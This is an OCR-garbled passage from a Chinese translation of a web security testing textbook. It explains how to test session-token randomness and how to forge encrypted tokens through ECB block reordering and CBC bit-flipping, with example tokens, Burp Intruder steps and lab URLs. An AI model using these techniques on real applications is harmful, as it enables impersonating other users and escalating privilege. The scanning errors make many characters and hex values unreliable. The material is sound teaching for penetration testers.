发 生 器 的 内 部 状态 ， 就 可 以 非常 准确 地 正 向 或 这 向 推断 出 它 的 办 


其 次 ， 未 通过 随机 性 统计 测试 的 令 牌 实际 上 也 许 根 本 无 法 预 
测 。 如 宁 令 牌 中 的 特定 数据 位 没有 通过 测试 ， 这 只 十 说 明 在 该 位 置 
观察 到 的 数据 位 序列 包含 真正 随机 的 令 牌 中 不 可 能 出 现 的 特征 。 但 
是， 如 有 果 和 共 试 根据 观察 到 的 特征 预测 该 数据 位 在 下 一 个 令 牌 中 的 
值 ， 这 样 的 做 法 无 异 于 盲目 猜测 。 鉴 于 需要 同时 预测 大 量 数 据 位 ， 
作出 正确 预测 的 机 率 非 常 低 。 


渗透 测试 步骤 


(1) 从 第 一 个 应 用 程序 页 面 到 任何 登录 功能 ， 遍 历 应 用 程 
序 ， 确 定 其 何 时 以 及 如 何 发 布 会 话 令 牌 。 以 下 两 种 行为 较为 常见 : 
口 只 要 收 到 未 提交 令 脾 的 请 求 ， 应 用 程序 就 会 创建 狐 会 
话 ; 
口 应 用 程序 在 成 功 登 录 后 创建 新 会 话 。 
要 想 目 动 收集 大 量 令 牌 ， 最 好 的 办 法 是 确定 一 个 导致 应 用 程序 
发 布 新 令 牌 的 请 求 〈 通 常 为 GET/ 或 登录 请 求 ) 。 
(2) 在 Burp Suite 中 ， 问 Burp Sequencer 发 送 创建 新 会 话 的 请 
求 ， 并 配置 令 牌 的 位 置 。 然 后 启动 实时 捕获 ， 收 集 尽 可 能 多 的 令 
牌 。 如 果 应 用 程序 采用 了 定制 会 话 管理 机 制 ， 则 只 能 远程 访问 该 应 
用 程序 ， 你 可 以 尽 可 能 迅速 地 收集 令 牌 ， 以 尽量 防止 丢失 发 布 给 其 
他 用 户 的 令 牌 ， 并 降低 时 间 依 赖 造成 的 影响 。 
(3) 如 果 应 用 程序 采用 商业 会 话 管理 机 制 并 且 / 或 者 你 可 以 本 
地 访问 该 应 用 程序 ， 则 可 以 在 受 探 条 件 下 获得 无 数 会 话 令 牌 。 
(4) 在 Burp Sequencer 收 集 令 牌 的 同时 ， 启 动 “自动 分 
析 ” (auto analyse) 设置 ， 使 Burp 定 期 自动 执行 统计 分 析 。 至 少 收集 
500 个 令 牌 ， 然 后 详细 审查 分 析 结 果 。 如 果 令 牌 中 有 足够 的 数据 位 
pene 继续 尽 可 能 长 时 间 地 收集 令 牌 ， 并 在 收集 其 他 令 牌 时 
审查 分 析 结 果 。 
(5) 如 果 令 有 牌 未 通过 随机 性 测试 ， 并 且 似 乎 包含 可 用 于 预测 
将 来 令 牌 的 模式 ， 则 可 以 从 男 一 个 IP 地 址 、 使 用 不 同 的 用 户 名 (如 
果 相 关 ) 重新 开始 收集 令 牌 的 操作 。 这 有 助 于 确定 是 否 能 够 发 现 相 
同 的 模式 ， 以 及 是 否 能 够 根据 前 一 次 操作 获得 的 令 牌 进行 推 上 晰 ， 确 
定 后 一 次 操作 得 到 的 令 牌 。 有 时 候 ， 一 个 用 户 收 集 的 令 牌 序列 表现 
出 某 种 模式 ， 但 因为 来 源 IP 地 址 之 类 的 信息 被 用 作 业 源 (如 随机 数 
ee ， 通 过 这 种 模式 并 不 能 推断 出 向 其 他 用 户 发 布 的 
She o 
(6) 如 果 攻 击 者 认为 已 经 充分 了 解 令 牌 生成 算法 ， 能 够 向 其 
他 用 户 的 会 话 发 动 自动 攻击 ， 通 过 一 段 定制 脚本 实施 攻击 可 能 是 最 
好 的 方法 ， 因 为 它 能 够 使 用 观测 到 的 特定 模式 生成 令 牌 ， 并 应 用 任 


P T AES ° SAR ETL PAS SE 
的 信息 。 
(7) 如 果 可 以 查看 源 代 码 ， 则 应 仔细 检查 负责 生成 会 话 令 牌 


的 代码 ， 了 解 它 使 用 的 机 制 ， 并 确定 是否 可 以 轻易 预测 该 令 牌 。 如 
FRE RE BES IT WL Be Os Pe SR te RG, TR Ti BS 
73 ER DV ARB S ESK TS J MTh T Fs HY A AR RAL ° 


尝试 访问 
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7.2.3 ”加 密令 有 牌 


一 些 应 用 程序 使 用 包含 用 户 有 意义 信息 的 令 牌 ， 并 通过 在 疝 用 户 
发 布 令 牌 之 前 对 令 牌 进行 加 密 来 避免 这 种 做 法 导致 的 明显 问题 。 由 于 
使 用 了 用 户 未 知 的 密 钥 对 令 牌 进行 加 密 ， 这 种 方法 似乎 较为 稳 受 ， 
为 用 户 无 法 解密 令 牌 并 算 改 其 内 容 。 

但 是 ， 在 某 些 情况 下 ， 根 据 所 采用 的 加 密 算 法 以 及 应 用 程序 处 理 
令 牌 的 方式 ， 用 户 甚 至 不 需要 解密 令 牌 ， 就 可 以 算 改 令 牌 中 有 意义 的 
内 容 。 这 听 起 来 可 能 有 些 匪 夷 所 思 ， 但 实际 上 上， 这些 攻 击 确实 可 行 ， 
而 且 有 时 轻易 就 可 以 实施 ， 事 实证 明 ， 现 实 世界 中 的 许多 应 用 程序 都 
易于 受到 这 种 攻击 。 不 过 ， 这 类 攻击 是 否 可 行 ， 要 取决 于 加 密令 牌 时 
所 采用 的 具体 加 密 算法 。 

1. ECB 密 码 

采用 加 密令 牌 的 应 用 程序 使 用 对 称 加 密 算 法 ， 用 于 解密 用 户 返 回 
的 令 牌 ， 恢 复 令 牌 中 有 意义 的 内 容 。 一 些 对 称 加 密 算法 使 用 “电子 密码 
本 ”(ECB) 密码 。 这 种 密码 将 明文 划分 成 同等 大 小 的 分 组 (如 每 组 8 
个 字 节 ) ， 然 后 使 用 密 钥 加 密 每 个 分 组 。 在 解密 过 程 中 ， 再 使 用 相同 
的 密 钥 对 每 个 密 文 分 组 进行 解密 ， 将 其 恢复 为 原始 的 明文 分 组 。 这 种 
加 密 方法 有 一 个 特点 ， 即 如 果 明 文 分 组 存在 某 种 模式 ， 这 可 能 导致 密 
文 分 组 也 存在 一 定 的 模式 ， 因 为 明文 分 组 与 加 密 后 的 密 文 分 组 完全 相 
同 。 对 于 某 些 类 型 的 数据 (如 位 图 图 像 ， 而 言 ， 这 意味 着 可 以 从 密 文 
判断 明文 中 的 有 意义 信息 ， 如 图 7-4 所 示 。 


图 7-4 ”使 用 ECB 密 码 加 密 的 明文 中 的 模式 可 能 会 在 生成 的 密 文中 可 见 


尽管 ECB 存 在 上 述 缺点 ， 但 Web 应 用 程序 仍然 经 党 使 用 这 类 密码 
来 加 密 信息 。 即 使 < 明文 模式 ”问题 不 会 出 现 ， 这 种 加 密 方 法 仍然 存在 
漏洞 。 这 主要 是 因为 它 的 明文 分 组 与 密 文 分 组 完全 对 应 所 致 。 

以 下 面 的 应 用 程序 为 例 ， 该 应 用 程序 的 令 牌 包含 儿 个 不 同 的 有 意 
义 组 件 ， 包括 一 个 数字 用 户 标 识 符 : 


rnd=2458992; apn-iTradeEUR_1;uid=-218; username-dafydd; time-634430423694715 


000; 
对 这 个 令 牌 进行 加 密 后 ， 它 变 得 没有 任何 意义 ， 并 且 可 能 通过 所 有 标 
准 的 随机 性 统计 测试 : 
68BAC980742B9EP80A27CBBBC0618E3876FF3D6C6B6A7B9CBE8ECRA466F9E11922776F0307 


329140AABD223F003A8309DDB6B970C47BA2E249A0670592D74BCD07D51A3JEB1I50EBEFC2E63 
885A5C8B131BE4210PF 


ECB 和 密码 用 于 加 密 8 字 市 的 分 组 ， 其 明文 分 组 与 对 应 的 密 文 分 组 如 
BATA: 


rnd=2458 


68BAC980742B9EF8 


992; app= 0A27CBBBC0618E38 
iTradeEU 76FF3D6C6E6A7B9C 
R_1;uid= B8FCA486F9E11922 
218;user 776F0307329140AA 
name=daf BD223F003A8309DD 
ydd; time B6B970C47BAZE249 
-6344304 A0670592D74BCD07 
23694715 D51A3E150EFC2E69 
000; 885A5C813154210F 


现在 ， 由 于 每 个 密 文 分 组 将 始终 解密 成 同一 个 明文 分 组 ， 因 此 ， 
攻击 者 束 可 以 改变 密 文 分 组 的 顺序 ， 以 某 种 有 意义 的 方式 修改 对 应 的 
明文 分 组 。 根 据 应 用 程序 处 理 生 成 的 加 密令 牌 的 具体 方式 ， 攻 击 者 可 
以 通过 这 种 方法 切换 到 其 他 用 户 ， 或 提升 目 己 的 权限 。 

例如 ， 如 果 将 第 二 个 分 组 复制 到 第 四 个 分 组 之 后 ， 将 得 到 如 下 所 
示 的 分 组 序列 : 


rnd=2458 68BAC980742B9EF8 
992;app= 0A27CBBBCO0618E38 
iTradeEU J6FF3ID6C6E6A7B9C 
R- ks B8FCA486F9E11922 
992;app= 0A27CBBBC0618E38 
218; user 776F0307329140AA 
name=daf BD223F003A8309DD 
ydd; time B6B970C47BA2 E249 
=6344304 A0670592D74BCD07 
23694715 D51A3BE150EFPC2E69 
000; 885A5C8131E4210F 


现在 ， 加 密 的 令 牌 中 包含 一 个 经 过 修改 的 uid 值 ， 以 及 一 个 复制 的 
app 值 。 具 体会 出 现 什 么 情况 ， 将 取决 于 应 用 程序 如 何 处 理 加 密令 牌 。 
通常 ， 以 这 种 方式 使 用 令 牌 的 应 用 程序 仅 检 查 加 密令 牌 的 某 些 部 分 ， 
如 用 户 标 识 符 。 如 果 应 用 程序 这 样 处 理 令 牌 ， 那 么 ， 应 用 程序 将 处 理 
uid 为 992 (而 不 是 最 初 的 218) 的 用 户 的 请 求 。 

上 述 攻 击 能 否 奏效 ， 了 取决 于 你 在 操纵 分 组 时 ， 应 用 程序 是 否 发 布 
一 个 令 牌 ， 在 其 中 包含 与 有 效 的 uid 值 对 应 的 rnd 值 。 另 一 种 更 加 可 靠 
的 攻击 方法 ， 是 以 适当 的 偏 移 值 注 册 一 个 包含 数值 的 用 户 名 ， 并 复制 


该 分 组 以 奉 换 现 有 的 uid 值 。 假 设 你 注册 用 户 名 daf1， 并 且 应 用 程序 发 
布 以 下 令 牌 : 
9A5A47BEP9B3B6603708P9DEAD67TC7PF4C76FF3D6C6E6A7B9CB8FCA486PF9E11922A5BC430A 


73B38C1l14BD223F003&AB309DDF29&5A6FDDC06C539305B5366F5F46B4C0D2BBBB08BD834BB 
ADEBCO7FFE87819D 


该 令 牌 的 明文 分 组 和 密 文 分 组 如 下 所 示 ; 


rnd=9224 9A5A47BF9B3B6603 


856; app= 708F9DERAD67C7F4C 
iTradeEU 76FF3D6C6E6A7B9C 
R_1;uid= B8FCA486F9E11922 


219;user A5BC430A73B38C14 
name=daf BD223F003A8309DD 


1; time=6 F29A5A6FODC06C53 
34430503 905B5366F5F4684C 
61065250 OD2BBBBO8BD834BB 
0; ADEBCO7FFE87819D 


然后 ， 如 果 将 第 七 个 分 组 复制 到 第 四 个 分 组 之 后 ， 加 密令 牌 将 包 
含 uid 值 1: 


rnd=9224 9A5A47BF9B3B6603 


856; app= 708F9DEAD67C7F4C 
iTradeEU 76FF3D6C6E6A7B9C 
R_1;uid= BSPCA486F9E11922 


1;time=6 F29AS5A6FODCO6C53 
219;user A5BC430A73B38C14 
name=daf BD223F003A8309DD 
1; time=6 F29A5A6F0DC06C53 
34430503 905B5366F5F4684C 
61065250 0D2BPBPBE08PBD834BB 
0; ADEBCO7FFE87819D 


EE Ahi SEA Ae SHA TO, A] LUA 
te ATA uid te, MAMARE — “TS i ARB AL 


尝试 访问 


http://mdsec.net/auth/363/ 


2. CBC 密 码 

鉴于 ECB 密 码 存 在 明显 的 缺陷 ， 于 是 人 们 开发 出 了 密码 块 链 
(CBC) 密码 。 使 用 CBC 密 码 时 ， 在 加 密 每 个 明文 分 组 之 前 ， 将 它 与 
前 一 个 密 文 分 组 进行 XOR 运 算 ， 如 图 7-5 所 示 。 这 样 ， 同 一 个 明文 分 组 
就 不 会 被 加 密 成 同一 个 密 文 分 组 。 解 密 时 逆向 执行 XOR 运 算 ， 每 个 解 
密 的 分 组 将 与 前 一 个 密 文 分 组 进行 XOR 运 算 ， 以 恢复 原始 的 明文 。 


明文 明文 明文 
初始 化 向 量 
CD 一 一 > 
i 
密 钥 一 > 密 钥 一 >| 分 组 密友 加密 
Oooo) 
密 文 
图 7-5 ”使 用 CBC 密 码 时 ， 在 加 密 每 个 明文 分 组 之 前 ， 将 它 与 前 一 个 密 文 分 组 进行 


XOR 运 算 


由 于 使 用 CBC 密 码 可 以 避免 使 用 ECB 密 码 造 成 的 某 些 问 题 ， 
此 ，CBC 模 式 经 常 使 用 标准 对 称 加 密 算 法 ， 如 DES 和 AES。 但 是 ， 由 
于 Web 应 用 程序 经 常 使 用 CBC 加 密 的 令 牌 ， 这 意味 着 攻击 者 不 需要 了 
解密 钥 就 可 以 操纵 解密 令 牌 的 某 些 部 分 。 

下 面 我 们 对 上 一 个 包含 几 个 不 同 的 有 意义 组 件 (包括 一 个 数字 用 
户 标 识 符 ) 的 应 用 程序 令 牌 稍 做 修改 : 


rnd=191432758301;app=eBankProdTC;uid=216;time=6343303; 


和 前 面 一 样 ， 加 密 这 段 信 息 后 ， 将 生成 一 个 明显 无 意义 的 令 牌 : 


OFBLF1IAFB4C874E69S5AAPC9AA4SC2 256 IDI ESE6G6BBAIB2829B173F255D447C51321586257C 


6E459A93635636F45D731443163201477 


由 于 这 个 令 牌 是 使 用 CBC 密 码 加 密 的 ， 因 此 ， 在 解密 该 令 牌 时 ， 
将 对 每 个 密 文 分 组 与 下 一 个 解密 的 文本 块 进行 XOR 运 算 ， 以 获得 明 
文 。 现 在 ， 如 果 攻 击 者 修改 密 文 〈 他 收 到 的 令 牌 ) 的 某 些 部 分 ， 将 导 
致 特定 的 分 组 被 解密 成 乱码 。 但 是 ， 这 也 导致 下 一 个 解密 的 文本 块 将 
与 不 同 的 值 进行 XOR 运 算 ， 从 而 生成 经 过 修改 但 仍 有 意义 的 明文 。 换 
言 之 ， 通 过 操纵 令 牌 中 的 某 个 分 组 ， 攻 击 者 能 够 修改 它 之 后 的 分 组 的 
解密 内 容 。 如 有 果 应 用 程序 以 危险 的 方式 处 理 生成 的 解密 令 牌 攻击 者 
将 能 够 切换 到 其 他 用 户 或 提升 目 己 的 权限 。 

为 什么 会 出 现 这 种 情况 呢 ? 在 上 述 示例 中 ， 攻 击 者 对 加 密 的 令 牌 
进行 修改 ， 每 次 以 任意 方式 更 改 一 个 字符 ， 并 将 修改 后 的 令 牌 发 送 给 
应 用 程序 。 在 这 个 过 程 中 ， 攻 击 者 会 提出 大 量 请 求 。 应 用 程序 对 每 个 
修改 后 的 令 牌 进行 解 宅 后 生成 的 部 分 值 如 下 所 示 : 


2?2772772727732858301; app=eBankProdTC; uid=216; time=6343303; 
2277272227732 758321; app=eBankProdTC; uid=216; time=6343303; 
rnd=1914????????; aqop-eBankProdTC; uid=216; time=6343303; 
rnd=1914????????; app=eAankProdTC;uid=216; time=6343303; 
rnd=191432758301????????nkPqgodTC;uid=216;time=6343303; 
rnd=191432758301????????nkProdUC;uid=216;time=6343303; 


2777770727* 


rnd=191432758301; app=eBa??7777777;uie=216; time=6343303; 


rnd=191432758301; app=eBa??????7??;uid=226; time=6343303; 


rnd=191432758301;app=eBankProdTC???????7?; timd=6343303; 


乱码 (以? 22 2222? 表示 ) 。 但 是 之 后 的 分 组 被 解密 成 有 意 
义 的 文本 ， 只 是 与 原始 令 牌 略 有 不 同 。 如 前 所 述 ， 出 现 这 种 不 同 ， 是 
因为 解密 的 文本 与 前 一 个 密 文 分 组 进行 了 XOR 运 算 ， 而 攻击 者 已 对 该 
密 文 分 组 进行 了 略微 修改 。 

虽然 攻击 者 看 不 到 解密 的 值 ， 但 应 用 程序 会 党 试 处 理 这 些 值 ， 随 
后 攻击 者 会 在 应 用 程序 的 响应 中 看 到 处 理 结果 。 上 有 具体 来 说 ， 接 下 来 会 
出 现 什么 情况 ， 取 决 于 应 用 程序 如 何 处 理 经 过 修改 的 解密 令 牌 。 如 果 
应 用 程序 拒绝 包含 任何 无 效 数 据 的 令 脾 ， 攻 击 将 会 失败 。 但 是 ， 以 这 
种 方式 使 用 令 牌 的 应 用 程序 通常 仅 查 看 解密 令 牌 的 某 些 部 分 ， 如 用 户 
标识 符 。 如 果 应 用 程序 这 样 处 理 令 牌 ， 那 么 ， 上 面 列 表 中 的 第 八 个 分 
组 将 能 够 成 功 实施 攻击 ， 应 用 程序 将 处 理 攻 击 者 提出 的 请 求 ， 并 认为 
用 户 的 uid 为 226， 而 不 是 最 初 的 216 © 


使 用 Burp Intrude 冲 的 “位 翻转 程序 ”(bit flipper) 有 效 载 全 类 型 ， 
可 以 轻松 测试 出 应 用 程序 是 否 存 在 这 方面 的 漏洞 。 首先 ， 需 要 使 用 你 
目 己 的 账户 登录 应 用 程序 。 然 后 ， 找 到 一 个 使 用 已 登录 会 话 并 在 响应 
中 显示 已 登录 用 户 标识 符 的 应 用 程序 页 面 ， 通 常 是 用 户 的 “ 主 登 录 ” 页 
或 “账户 详细 资料 页。 图 7-6 显 示 了 如 何 将 Burp Intruder 设 置 为 针对 用 
户 的 主页 ， 其 中 的 加 密会 话 令 牌 被 标记 为 有 效 载 集 位 置 。 
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2301007223 F tox/3.6é 
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Encoding detla 
Į ‘harset: 59-11,1 1 
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: keep-alive 
tps: 1 et t 
ession] deSDBLASBO7OP2 FSO2 AAS4ES EFS IDASE? LEFICAGCETO4GSICCCFSATECDEFSEPFOALO? 
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图 7-6 ‘Burp Intruder 配 置 为 修改 加 密会 话 令 牌 


所 需 的 有 效 载 傈 配置 如 图 7-7 所 示 。 它 指示 Burp 处 理 令 牌 的 原始 
值 ， 将 其 视 为 ASCII 编 码 的 十 六 进 制 代码 ， 并 “翻转 ”每 个 字符 位 置 的 每 
个 数据 位 。 这 种 方法 非常 理想 ， 因 为 只 需要 提交 较 小 数量 的 请 求 (S 
牌 中 的 每 个 字 节 8 个 请 求 ，， 并 且 几 乎 总 是 能 够 确定 应 用 程序 是 否 易 于 
aie. o 这样 束 可 以 采用 更 有 和 针对 性 的 攻击 ， 对 应 用 程序 的 漏洞 加 
以 利用 。 


borp suite professonal =) fii] 


图 7-7 ”将 Burp Intruder 配 置 为 “翻转 ”加 密令 牌 中 的 每 个 位 


实施 攻击 时 ， 最 初 的 请 求 并 不 会 导致 应 用 程序 的 响应 产生 任何 明 
显 的 变化 ， 用 户 的 会 话 也 未 遭 到 修改 。 这 本 身 就 值得 我 们 注意 ， 因 为 
这 表示 令 牌 的 第 一 部 分 并 未 用 于 确定 登录 用 户 。 攻 击 过 程 中 随后 提交 
的 许多 请 求 导致 应 用 程序 重 定向 到 登录 页 面 ， 这 说 明 所 做 的 修改 已 导 
致 令 牌 失效 。 关 键 在 于 ， 还 存在 一 些 请 求 ， 其 响应 似乎 是 有 效 会 话 的 
一 部 分 ， 但 实际 上 与 原始 的 用 户 标识 符 无 关 。 这 些 请 求 与 包含 uid 的 令 
牌 分 组 对 应 。 某 些 情况 下 ， 应 用 程序 仅 显示 “未 知 用 户 *， 表 示 经 过 修 
改 的 uid 没 有 对 应 的 实际 用 户 ， 因 此 攻击 将 会 失败 。 其 他 情况 下 ， 应 用 
程序 会 显示 其 他 注册 用 户 的 名 称 ， 这 说 明 攻击 已 取得 成 功 。 攻 击 结果 
如 图 7-8 所 示 。 我 们 在 其 中 定义 了 一 个 “提取 grep” 列 来 显示 登录 用 户 的 
标识 符 ， 并 设置 过 滤器 来 隐藏 将 应 用 程序 重 定向 到 登录 页 面 的 响应 。 


atack save columns 
Filter: hiding 3x responses 


| Pa el 1313 [unknown user, | 
30 Di 200 on. unknown user. pS 


bos D61A58378F2F003 200 | lb 1312 |John Heman | | 
206 [D81458B378F2F903./200 |) 1313 unknownuser, | | 


zor A |1313 __|unmnownuser. | | 
fz18 De an Em 


<br><br><a hret="MyDetalls.ashx">Your details</a><br><a 
hrefl="ChangePassvord.ashx">Change password</a><br><a 
href="Logout .ashx">Logout</ a><br></body></html> 


图 7-8 “攻击 加 密令 牌 的 成 功 * 位 翻转 "攻击 


确定 存在 的 漏洞 后 束 可 以 通过 更 有 和 针对 性 的 攻击 来 利用 该 漏洞 
为 此 ， 需 要 从 结果 中 确定 ， 如 果 用 户 的 资料 发 生变 化 ， 加 密令 牌 中 的 
哪个 数据 块 会 发 生变 化 。 然 后 ， 再 实施 攻击 以 测试 这 个 数据 块 中 的 其 
他 值 。 这 时 ， 可 以 使 用 Burp Intrude 冲 的 “数字 ”有 效 载荷 类 型 。 


尝试 访问 


http://mdsec.net/auth/365/ 


T 注解 一 些 应 用 程序 经 常 加 密 请 求 参 数 中 的 有 意义 数据 


(如 商品 的 价格 ) ， 以 防止 攻击 者 自 改 这 些 数据 。 如 采 加 密 数 据 明 
显 在 应 用 程序 的 功能 中 发 挥 着 重要 作用 ， 这 时 应 竹 试 实施 “位 翻 
转 ” 攻 击 ， 看 是 否 能 够 以 有 意义 的 方式 操纵 加 密 信息 ， 从 而 达到 破 
坏 应 用 程序 逻辑 的 目的 。 


当然 ， 利 用 本 节 所 壕 的 漏洞 的 主要 目的 是 伪 疲 成 其 他 应 用 程序 用 
户 一 一 最 好 是 拥有 较 高 权限 的 管理 用 户 。 如 有 果 只 能 盲目 修改 加 密令 牌 
的 某 些 部 分 ， 则 攻击 能 否 取得 成 功 ， 只 能 靠 运气 。 但 是 ， 茶 些 情况 
下 ， 应 用 程序 可 能 会 为 你 提供 一 些 “ 提 示 ”。 如果 应 用 程序 采用 对 称 加 
密 防 止 用 户 自 改 数 据 ， 则 通常 整个 应 用 程序 都 会 使 用 相同 的 加 密 算 法 
和 密 钥 。 在 这 种 情况 下 ， 如 果 应 用 程序 的 任何 功能 同 用 户 披露 了 任意 
加 密 字符 串 的 解密 值 ， 则 可 以 利用 这 一 “提示 "完全 解密 任何 受 保 扩 的 
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以 笔者 发 现 的 一 个 提供 文件 上 传 /下 载 功 能 的 应 用 程序 为 例 。 上 传 
文件 后 ， 用 户 将 获得 一 个 包含 文件 名 参数 的 下 载 链 接 。 为 防止 修改 文 
件 路 径 的 各 种 攻击 ， 应 用 程序 对 这 个 参数 中 的 文件 名 进行 加 密 。 但 
是 ， 如 果 用 户 请 求 一 个 已 删除 的 文件 ， 应 用 程序 将 显示 一 条 错误 消 
妃 ， 在 其 中 显示 所 请 求 文件 的 解密 名 称 。 攻 击 者 对 这 种 行为 加 以 利用 
就 可 以 确定 应 用 程序 使 用 的 任何 加 密 字 符 中 的 明文 值 ， 包 括 会 话 令 牌 
的 值 。 笔 者 发 现 ， 该 应 用 程序 的 会 话 令 牌 包含 各 种 有 意义 的 值 (具有 
结构 化 的 格式 ) ， 因 此 ， 易 于 受到 本 下 所 述 的 各 种 攻击 。 由 于 这 些 值 
属于 文本 格式 的 用 户 名 和 应 用 程序 角色 ， 而 不 是 数字 标识 符 ， 因 此 ， 
仅仅 使 用 盲目 的 位 翻转 很 难 对 其 实施 成 功 的 攻击 。 但 是 ， 通 过 使 用 文 
件 名 解密 了 范 数 就 可 以 在 查看 结果 的 同时 ， 对 令 牌 的 数据 位 进行 系统 地 


修改 。 这 样 就 可 以 构造 一 个 令 牌 ， 该 令 牌 一 旦 解密 将 指定 有 效 的 用 户 
和 管理 角色 ， 从 而 完全 控制 整个 应 用 程序 。 


TZ 注解 还 可 以 使 用 其 他 技巧 来 解密 应 用 程序 使 用 的 加 密 数 
据 。 例 如 ， 利 用 一 个 “揭示 性 ?加 密 提 示 (“reveal” encryption 

oracle) 可 获得 加 密令 牌 的 明文 值 。 虽 然 在 解密 密码 时 ， 这 可 能 是 
一 个 重要 的 漏洞 ， 但 是 ， 解 密会 话 令 牌 并 不 会 使 攻击 者 能 够 立即 攻 


破 其 他 用 户 的 会 话 。 不 过 ， 解 密令 牌 有 助 于 攻击 者 了 解 明文 的 结 
构 ， 帮 助 他 们 实施 针对 性 的 “位 翻转 攻击。 有 关 “ 揭 示 ” 加 蜜 提示 攻 
击 的 详细 信息 ， 请 参阅 第 11 章 。 

针对 填充 提示 (padding oracle) 的 旁 路 攻击 可 用 于 破解 加 密令 
牌 。 请 参阅 第 18 章 了 解 详细 信息 。 


渗透 测试 步骤 


许多 时 候 ， 在 应 用 程序 采用 加 密令 牌 时 ， 具 体 的 攻击 方法 可 能 
要 取决 于 各 种 因素 ， 包 括 分 组 边界 相对 于 攻击 的 数据 的 偏 移 值 ， 以 
及 应 用 程序 是 否 允 许 修改 明文 的 结构 。 完 全 言 目 地 开始 攻击 将 很 难 
实施 有 效 的 攻击 ， 但 在 许多 情况 下 ， 这 种 攻击 也 可 能 会 奏效 。 

(1) 除非 会 话 令 牌 明显 有 意义 或 本 身 是 连续 的 ， 否 则 应 始终 
考虑 令 牌 被 加 密 的 可 能 性 。 通 常 ， 通 过 注册 几 个 不 同 的 用 户 名 ， 并 
在 用 户 名 中 每 次 添加 一 个 字符 ， 就 可 以 确定 应 用 程序 是 否 采 用 分 组 
密码 。 如 果 添 加 一 个 字符 会 导致 会 话 令 牌 的 长 度 增 加 8 或 16 个 字 
节 ， 这 说 明 应 用 程序 可 能 使 用 的 是 分 组 密码 。 要 确认 这 一 点 ， 可 以 
继续 在 用 户 名 中 添加 字 节 ， 看 随后 会 话 令 牌 是 否 会 同样 增加 8 或 16 
DET ° 

(2) 通常 ， 在 盲目 的 情况 下 ， 很 难 确定 并 利用 ECB 密 码 操纵 
漏洞 。 但 是 ， 可 以 党 试 言 目地 复制 并 移动 令 牌 中 的 密 文 分 组 ， 并 查 
看 能 否 能 够 以 自己 的 用 户 账 户 或 其 他 用 户 账户 登录 应 用 程序 ， 或 根 
本 无 法 登录 应 用 程序 。 

(3) 你 可 以 通过 使 用 “位 翻转 2 有效 载 傈 源 对 整个 令 牌 实施 Burp 
Intruder 攻 击 ， 测 试 应 用 程序 是 否 存在 CBC 密 码 操 纵 漏洞 。 如 果 位 翻 
转 确 定 了 令 牌 中 的 某 个 部 分 ， 并 且 修 改 该 部 分 后 仍然 能 够 以 其 他 用 
户 或 不 存在 的 用 户 身份 访问 有 效 会 话 ， 那 么 ， 攻 击 者 可 以 扩大 攻击 
ee eS ee en estas tees 

(4) 在 上 壕 两 种 攻击 过 程 中 ， 监 视 应 用 程序 的 响应 ， 确 定 与 
提交 的 每 个 请 求生 成 的 会 话 有 关 的 用 户 ， 并 党 试 利用 任何 机 会 来 提 
升 自己 的 权限 。 

(5) 如 果 攻 击 并 未 奏效 ， 但 通过 步骤 1 得 知 ， 攻 击 者 提交 的 长 
度 可 变 的 输入 已 被 合并 到 令 牌 中 ， 这 时 ， 应 尝试 每 次 增加 一 个 字 
符 ， 直 到 达到 所 使 用 的 分 组 的 大 小 ， 以 生成 一 系列 令 牌 。 然 后 ， 对 
于 每 个 生成 的 令 牌 ， 应 执行 步骤 (2) 和 步骤 (3) 。 这 将 增加 需要 
修改 的 数据 恰好 与 分 组 边界 对 齐 的 机 率 ， 帮 助 你 实施 成 功 的 攻击 。 
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不 管 应 用 程序 如 何 确 保 它 生 成 的 令 牌 不 包含 任何 有 意义 的 信息 ， 
并 且 很 难 加 以 分 析 或 预测 ， 但 如 采 生 成 令 牌 后 不 对 其 小 心 处 理 ， 它 的 
会 话机 制 仍 然 易 于 受到 各 种 攻击 。 例 如 ， 如 有 果 以 某 种 方式 将 令 脾 透露 
给 攻击 者 ， 那 么 即使 攻击 者 无 法 预测 令 牌 ， 也 仍然 能 够 支持 用 户 的 会 
话 


应 用 程序 以 不 安全 的 方式 处 理 令 牌 ， 致 使 令 牌 易 于 遭受 多 种 攻 
eave 


号 错误 观点 “因为 使 用 SSL， 所 以 我 们 的 令 牌 十 分 安全 ， 不 


会 泄露 给 第 三 方 。” 

正确 使 用 SSL 确 实 有 助 于 防止 会 话 令 牌 被 拦截 。 但 是 ， 即 
使 采用 SSL， 我 们 犯 下 的 各 种 错误 仍然 可 导致 令 牌 以 明文 形式 
本 攻击 者 可 对 终端 用 户 实施 各 种 直接 攻击 ， 获 得 他 
门 的 令 牌 。 


Q OLA “我 们 的 令 牌 由 采用 成 熟 、 可 靠 加 密 技术 的 平台 


生成 ， 因 此 不 可 能 被 攻破 。” 

默认 情况 下 ， 应 用 程序 服务 恬 会 在 用 户 初 次 访问 站 点 时 创 
建 一 个 会 话 cookie， 并 将 此 cookie 用 于 用 户 与 站 点 的 所 有 交互 。 
我 们 在 下 面 的 章节 中 将 讲 到 ， 这 可 能 会 导致 令 牌 处 理 方面 的 各 
种 安全 漏洞 。 


7.3.1 在 网 络 上 泄露 令 牌 

如 果 通 过 网 络 以 非 加 密 方式 传送 会 话 令 牌 ， 束 会 产生 这 方面 的 漏 
洞 ， 人 允许 处 在 适当 位 置 的 窃听 者 能 够 截获 令 牌 并 因此 伪装 成 合法 用 
户 。 窃 听 的 适当 位 置 包括 用 户 的 本 地 网 络 、 用 户 所 在 的 IT 部 门 、 用 户 


的 ISP、 因 特 网 骨干 网 、 应 用 程序 的 ISP 和 运行 应 用 程序 组 织 的 开 部 
门 。 处 在 上 壕 任 何 一 个 位 置 ， 相 关 组 织 的 授权 人 员 和 任何 攻破 相关 基 
础 架构 的 外 部 攻击 者 都 可 以 截取 会 话 令 牌 。 

在 最 简单 的 情形 中 ， 应 用 程序 使 用 一 个 非 加 密 的 HTTP 连 接 进行 通 
信 。 这 使 攻击 者 能 够 拦截 客户 端 和 服务 器 间 传 送 的 所 有 数据 ， 包 括 登 
录 证 书 、 个 人 信息 、 支 付 细节 等 。 这 时 ， 攻 击 者 通常 不 必 攻 击 用 户 的 
会 话 ， 因 为 攻击 者 已 经 可 以 查阅 特权 信息 ， 并 能 够 使 用 截获 的 证 书 登 
录 ， 从 而 执行 其 他 恶意 操作 。 然 而 ， 有 些 时 候 ， 用 户 的 会 话 仍然 是 攻 
击 者 的 主要 攻击 目标 。 例 如 ， 如 果 截 获 的 证 书 不 足以 执行 第 二 次 登录 
(如 银行 应 用 程序 可 能 要 求 登 录 者 提交 在 不 断 变 化 的 物理 令 牌 上 显示 
